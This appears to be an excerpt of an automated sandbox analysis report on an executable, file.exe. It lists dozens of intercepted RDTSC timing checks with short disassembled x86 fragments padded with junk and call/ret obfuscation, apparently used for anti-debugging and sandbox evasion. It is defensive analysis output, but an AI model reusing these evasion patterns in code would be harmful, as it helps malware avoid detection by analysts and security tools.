Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14148B6 second address: 14148CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9844BC1D5Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414CB3 second address: 1414CC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F98450EE8C6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414CC0 second address: 1414D3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F9844BC1D5Eh 0x0000000e jo 00007F9844BC1D58h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 nop 0x00000017 jmp 00007F9844BC1D66h 0x0000001c push 0000001Eh 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F9844BC1D58h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 mov dword ptr [ebp+1244BDF7h], eax 0x0000003e nop 0x0000003f jmp 00007F9844BC1D62h 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F9844BC1D63h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1414D3F second address: 1414D5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F98450EE8C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14150AC second address: 14150C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9844BC1D68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14150C8 second address: 14150CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14150CC second address: 1415132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F9844BC1D58h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 movzx ecx, cx 0x00000026 lea eax, dword ptr [ebp+12485BF7h] 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F9844BC1D58h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+1244BE06h] 0x0000004c nop 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1415132 second address: 1415137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1415137 second address: 141513D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 141513D second address: 1415141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1415141 second address: 13F1835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9844BC1D67h 0x0000000e nop 0x0000000f or edx, 683FB9E2h 0x00000015 mov cl, CEh 0x00000017 lea eax, dword ptr [ebp+12485BB3h] 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F9844BC1D58h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 push eax 0x00000038 jmp 00007F9844BC1D60h 0x0000003d mov dword ptr [esp], eax 0x00000040 movzx edi, dx 0x00000043 call dword ptr [ebp+122D181Ch] 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1440AD9 second address: 1440AEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1441178 second address: 144117E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144117E second address: 1441195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F98450EE8CDh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441195 second address: 1441199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446E06 second address: 1446E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F98450EE8C6h 0x0000000d jmp 00007F98450EE8CEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445BDF second address: 1445BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445D49 second address: 1445D59 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445D59 second address: 1445D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445D5F second address: 1445D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445D63 second address: 1445D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F9844BC1D5Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446120 second address: 1446126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446126 second address: 1446131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446131 second address: 1446145 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F98450EE8CAh 0x00000008 jnp 00007F98450EE8DDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446145 second address: 1446162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9844BC1D61h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144570A second address: 144570E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144570E second address: 1445714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445714 second address: 144574C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F98450EE8C6h 0x0000000b pop ebx 0x0000000c push ebx 0x0000000d jmp 00007F98450EE8D1h 0x00000012 jmp 00007F98450EE8CDh 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jno 00007F98450EE8C6h 0x00000023 pop ecx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446486 second address: 144648A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144648A second address: 144649C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F98450EE8CEh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446751 second address: 1446757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446757 second address: 1446786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8D8h 0x00000009 popad 0x0000000a jmp 00007F98450EE8CEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446786 second address: 144678F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446B05 second address: 1446B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446B09 second address: 1446B0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB5DF second address: 13CB5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E31E second address: 144E329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E329 second address: 144E32D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E32D second address: 144E331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E4B2 second address: 144E4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E4C3 second address: 144E4E4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9844BC1D56h 0x00000008 jmp 00007F9844BC1D67h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E4E4 second address: 144E544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F98450EE8D7h 0x0000000a jmp 00007F98450EE8D9h 0x0000000f popad 0x00000010 js 00007F98450EE8DAh 0x00000016 jmp 00007F98450EE8D4h 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 pushad 0x00000023 jnp 00007F98450EE8C6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144E6D3 second address: 144E6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9844BC1D64h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144EDB0 second address: 144EDD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F98450EE8CFh 0x0000000b jno 00007F98450EE8C6h 0x00000011 popad 0x00000012 pushad 0x00000013 je 00007F98450EE8C6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144EDD7 second address: 144EDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144F234 second address: 144F246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 jng 00007F98450EE8C6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144F246 second address: 144F24B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14516D2 second address: 14516D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14544A3 second address: 14544E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Dh 0x00000007 jmp 00007F9844BC1D69h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F9844BC1D6Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9844BC1D5Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14544E2 second address: 14544E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1454652 second address: 1454657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1454657 second address: 145465C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145990D second address: 145992F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9844BC1D62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push edx 0x0000000d pop edx 0x0000000e jp 00007F9844BC1D56h 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145992F second address: 1459949 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007F98450EE8C6h 0x0000000b pop esi 0x0000000c je 00007F98450EE8D2h 0x00000012 jne 00007F98450EE8C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459E2D second address: 1459E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A0DD second address: 145A0E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A0E3 second address: 145A0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145AD2E second address: 145AD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145AD32 second address: 145AD3E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9844BC1D56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145DE9F second address: 145DEBA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98450EE8CEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F98450EE8C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145DEBA second address: 145DED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D62h 0x00000007 jnl 00007F9844BC1D56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145DED9 second address: 145DEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145D7C2 second address: 145D7CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 ja 00007F9844BC1D56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146138E second address: 14613A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F98450EE8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14617E9 second address: 14617FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14617FA second address: 1461810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F98450EE8CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1461810 second address: 1461814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1461814 second address: 1461818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1467EDF second address: 1467EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1467EE7 second address: 1467EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14681E4 second address: 14681EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14681EA second address: 14681EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14684BE second address: 14684C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14684C4 second address: 14684CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146876B second address: 1468771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1468771 second address: 1468777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1468777 second address: 14687A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9844BC1D60h 0x00000009 popad 0x0000000a pop esi 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F9844BC1D66h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469005 second address: 146900B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146900B second address: 1469016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469329 second address: 1469362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F98450EE8D8h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007F98450EE8D1h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469895 second address: 1469899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469899 second address: 14698A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F98450EE8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14707E7 second address: 14707FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14707FD second address: 1470801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1470801 second address: 1470805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473703 second address: 147370B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473856 second address: 1473872 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9844BC1D63h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473872 second address: 14738C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8D8h 0x00000009 pop ebx 0x0000000a jmp 00007F98450EE8D4h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F98450EE8D8h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14739E8 second address: 1473A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9844BC1D69h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473A0C second address: 1473A1C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F98450EE8C6h 0x00000008 jno 00007F98450EE8C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473A1C second address: 1473A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473A22 second address: 1473A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F98450EE8C6h 0x0000000a rdtsc
